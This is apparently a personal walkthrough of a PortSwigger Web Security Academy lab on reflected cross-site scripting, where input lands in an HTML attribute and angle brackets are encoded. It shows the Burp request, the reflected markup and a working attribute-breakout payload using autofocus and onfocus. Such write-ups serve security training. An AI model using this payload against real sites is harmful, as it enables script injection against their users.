Reflected XSS into attribute with angle brackets HTML encoded

Description

This lab contains a reflected cross-site scripting vulnerability in the search blog functionality where angle brackets are HTML-encoded. To solve this lab, perform a cross-site scripting attack that injects an attribute and calls the alert function.

Approach

After accessing the lab, I tried injecting various tags and XSS payloads into the search bar, but they were all filtered. I then sent a request to Burp Suite Repeater and noticed that the input was placed as the value of an attribute inside a tag. For example, when I sent ichyaboy:

GET /?search=ichyaboy HTTP/2
Host: 0a7300a90469071c8154a78d00720088.web-security-academy.net
Cookie: session=4UCdeZUfe9RkaZWv3JRpy4Zduw2IWZRy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...

I noticed that it appeared here:

<input type=text placeholder='Search the blog...' name=search value="ichyaboy">

To escape this context, I tried inserting another " to close the current attribute and set a new one to trigger my XSS. I used the following payload:

" autofocus onfocus=alert(1) x="

After sending this payload, I received an alert box, which solved the lab.

PreviousReflected XSS into HTML context with nothing encoded NextReflected XSS into a JavaScript string with angle brackets HTML encoded

hashtagDescription

hashtagApproach

Description

Approach